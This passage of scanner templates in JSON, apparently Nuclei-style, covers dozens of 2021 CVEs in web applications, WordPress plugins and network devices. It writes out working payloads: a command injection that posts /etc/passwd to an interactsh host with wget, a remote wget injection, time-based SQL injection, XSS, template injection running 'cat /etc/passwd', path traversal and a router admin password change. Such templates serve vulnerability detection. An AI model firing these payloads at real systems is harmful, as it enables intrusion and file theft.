Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Stop Spammers Spam Prevention","Tags:"],"condition":"and"}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/car-repair-services/css","/wp-content/themes/car-repair-services/js","id=\"car-repair-services-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-25052","info":{"name":"WordPress Button Generator <2.3.3 - Remote File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41749","info":{"name":"CraftCMS SEOmatic - Server-Side Template Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}\nCache-Control: max-age=0\n\n","GET / HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb\nCache-Control: max-age=0\n\n"],"skip-variables-check":true,"stop-at-first-match":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"/{{marker}}{{result}}\") || regex(\"root:.*:0:0:\", body_2)","contains_any(body, \"Craft CMS\", \"SEOmatic\" ,\"CRAFT_CSRF\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24409","info":{"name":"Prismatic < 2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(document.domain)%2F%2F%22 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"Leave A Review?\")","contains(body_2, \"onanimationend=alert(document.domain)\")"],"condition":"and"}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31249","info":{"name":"CHIYU TCP/IP Converter - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: setting.htm","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-39152","info":{"name":"XStream <1.4.18 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs>GBK</cs>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.runtime.Source_-URLData>\n      <url>http://{{interactsh-url}}/internal/</url>\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\n      <hash>1111</hash>\n      <array>b</array>\n      <length>0</length>\n      <lastModified>0</lastModified>\n    </jdk.nashorn.internal.runtime.Source_-URLData>\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2021-41432","info":{"name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"user\"\n\n{{username}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"pass\"\n\n{{password}}\n------WebKitFormBoundarykGJmx9vKsePrMkVp\nContent-Disposition: form-data; name=\"submit\"\n\nLogin\n------WebKitFormBoundarykGJmx9vKsePrMkVp--\n","GET /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\n","POST /admin.php?p=entry&action=write HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n","GET /index.php/2022/10 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_4, '<p><script>alert(document.cookie)</script></p>')","contains(body_4, 'FlatPress')","contains(header_4, 'text/html')","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Simple Giveaways"]}]},{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24849","info":{"name":"WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{post_data}}\n"],"payloads":{"post_data":["action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--","action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/json\")","contains(body, \"success\")"],"condition":"and"}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 